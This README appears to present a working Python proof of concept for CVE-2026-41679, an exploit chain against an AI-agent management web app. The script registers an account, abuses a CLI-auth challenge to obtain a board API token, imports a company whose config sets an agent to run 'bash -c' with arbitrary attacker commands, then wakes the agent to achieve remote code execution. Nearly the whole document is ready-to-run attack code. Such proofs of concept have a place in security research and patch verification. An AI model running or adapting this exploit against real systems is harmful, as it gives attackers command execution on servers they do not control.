README.md
Rendering markdown...
import argparse
import requests
import urllib3
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)
VERIFY = False
def signup(target, name, email, password):
url = f"{target}/api/auth/sign-up/email"
headers = {"Content-Type": "application/json"}
data = {"email": email, "password": password, "name": name}
resp = requests.post(url, headers=headers, json=data, verify=VERIFY)
if resp.status_code != 200 and resp.status_code != 422:
raise Exception(
f"Couldnot create account, status: {resp.status_code} - {resp.text}."
)
def signin(target, email, password):
url = f"{target}/api/auth/sign-in/email"
headers = {"Content-Type": "application/json"}
data = {"email": email, "password": password}
resp = requests.post(url, headers=headers, json=data, verify=VERIFY)
if "Set-Cookie" not in resp.headers:
raise Exception(f"Failed to login, status: {resp.status_code} - {resp.text}.")
set_cookie_header_value = resp.headers["Set-Cookie"]
session_cookie = set_cookie_header_value.split(";")[0]
return session_cookie
def create_challenge(target):
url = f"{target}/api/cli-auth/challenges"
headers = {"Content-Type": "application/json"}
data = {"command": "test"}
resp = requests.post(url, headers=headers, json=data, verify=VERIFY)
response_data = resp.json()
if (
"id" not in response_data
or "token" not in response_data
or "boardApiToken" not in response_data
):
raise Exception(
f"Couldn't create challenge, status: {resp.status_code} - {resp.text}."
)
id = response_data["id"]
token = response_data["token"]
board_api_token = response_data["boardApiToken"]
return id, token, board_api_token
def approve_challenge(target, id, token, session_cookie):
url = f"{target}/api/cli-auth/challenges/{id}/approve"
headers = {
"Cookie": session_cookie,
"Content-Type": "application/json",
"Origin": target,
}
data = {"token": token}
resp = requests.post(url, headers=headers, json=data, verify=VERIFY)
response_data = resp.json()
#validations...
def import_company(target, board_api_token, commands):
url = f"{target}/api/companies/import"
headers = {
"Content-Type": "application/json",
"Origin": target,
"Authorization": f"Bearer {board_api_token}",
}
data = {
"source": {
"type": "inline",
"files": {
"COMPANY.md": "---\nname: attacker-corp\nslug: attacker-corp\n---\nx",
"agents/pwn/AGENTS.md": "---\nkind: agent\nname: pwn\nslug: pwn\nrole: engineer\n---\nx",
".paperclip.yaml": f"agents:\n pwn:\n icon: terminal\n adapter:\n type: process\n config:\n command: bash\n args:\n - -c\n - {commands}"
},
},
"target": {"mode": "new_company", "newCompanyName": "attacker-corp"},
"include": {"company": True, "agents": True},
"agents": "all",
}
resp = requests.post(url, headers=headers, json=data, verify=VERIFY)
response_data = resp.json()
if "agents" not in response_data or len(response_data["agents"]) < 1:
raise Exception(
f"No agents created, status: {resp.status_code} - {resp.text}."
)
agent = response_data["agents"][0]
if "id" not in agent:
raise Exception(
f"Found agent doesn't have an id, status: {resp.status_code} - {resp.text}."
)
return agent["id"]
def trigger_agent(target, board_api_token, agent_id):
url = f"{target}/api/agents/{agent_id}/wakeup"
headers = {
"Content-Type": "application/json",
"Origin": target,
"Authorization": f"Bearer {board_api_token}",
}
resp = requests.post(url, headers=headers, verify=VERIFY, json={})
response_data = resp.json()
if "status" not in response_data or "id" not in response_data:
raise Exception(
f"Error triggering agent, no id or status returned, status: {resp.status_code} - {resp.text}."
)
return response_data["id"], response_data["status"]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="This is a POC of CVE-2026-41679.")
parser.add_argument(
"-t", help="The endpoint of the target to check.", dest="target", required=True
)
parser.add_argument("-n", help="The name to use.", dest="name", default="attacker")
parser.add_argument(
"-e", help="The email-adress to use.", dest="email", default="[email protected]"
)
parser.add_argument(
"-p", help="The password to use.", dest="password", default="P@sswOrd123!"
)
parser.add_argument(
"-c", help="The commands to use.", dest="commands", default="id > /tmp/pwned.txt && whoami >> /tmp/pwned.txt"
)
args = parser.parse_args()
try:
signup(args.target, args.name, args.email, args.password)
session_cookie = signin(args.target, args.email, args.password)
challenge_id, token, board_api_token = create_challenge(args.target)
approve_challenge(args.target, challenge_id, token, session_cookie)
agent_id = import_company(args.target, board_api_token, args.commands)
id, status = trigger_agent(args.target, board_api_token, agent_id)
print(f"Vulnerable, was able to trigger RCE with id: {id}.")
except Exception as ex:
print(str(ex))